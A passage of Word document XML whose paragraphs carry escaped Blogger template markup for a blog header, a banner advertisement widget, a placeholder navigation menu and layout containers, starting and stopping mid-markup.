    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='description'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;!--No header image --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;div id='header-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;div class='titlewrapper'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        &lt;h1 class='title'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='title'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:include name='description'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;b:includable id='description'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;div class='descriptionwrapper'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;p class='description'&gt;&lt;span&gt;&lt;data:description/&gt;&lt;/span&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;b:includable id='title'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:tag cond='data:blog.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;data:title/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='a-break'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='advertisement-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;b:section class='topadvert' id='Advertisement-Top' name='Top Banner Advertisement' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                          &lt;b:widget id='HTML999' locked='false' title='umahbelajar.com' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='content'&gt;&lt;![CDATA[&lt;a href="javascript:void(0);"&gt;&lt;img src="https://3.bp.blogspot.com/-prrYJPXbeFM/XYLwXpOmgjI/AAAAAAAAABQ/l8K1Nm68vnQSzd6WARUQ5uVnuIOhnjkOgCLcBGAsYHQ/s320/umah%2Bbelajar.jpg "/&gt;&lt;/a&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='n-break'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='navigational-menu'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;b:section class='navigationmenu' id='NavG' name='Navigation Menu' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;b:widget id='LinkList999' locked='false' title='Main Navigation Menu' type='LinkList' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-7'&gt;[MEGA MENU]&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-5'&gt;/&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-6'&gt;[MEGA MENU]&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-3'&gt;/&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-4'&gt;/&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-1'&gt;courses&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-0'&gt;Home&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-3'&gt;_Sub Item&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-2'&gt;_Sub Item&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-5'&gt;__Sub Sub Item&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-4'&gt;__Sub Sub Item&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-7'&gt;Video Gallery&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='text-6'&gt;travel&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='sorting'&gt;NONE&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-1'&gt;http://&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-2'&gt;/&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;b:widget-setting name='link-0'&gt;/&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='responsive-navigation'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;select id='srt' onchange='window.location.assign(document.getElementById(&amp;quot;srt&amp;quot;).value)'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;option&gt;Menu&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:loop values='data:links' var='link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;option expr:value='data:link.target'&gt;&lt;data:link.name/&gt;&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='widget-content dropmenu hidden' id='NavM'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;b:loop values='data:links' var='link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;li&gt;&lt;a expr:href='data:link.target'&gt;&lt;data:link.name/&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;b:include name='quickedit'/&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='search-act'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;a class='search' href='javascript:void(0);'&gt;&lt;i class='ion-ios-search'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='header-cap-bottom cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='clear-header'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='tabs-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='tabs-cap-top cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='fauxborder-left tabs-fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='fauxborder-right tabs-fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='region-inner tabs-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='tabs-cap-bottom cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='main-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='main-cap-top cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='fauxborder-left main-fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='fauxborder-right main-fauxbo</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>rder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='region-inner main-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    &lt;div class='columns fauxcolumns'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='fauxcolumn-outer fauxcolumn-center-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
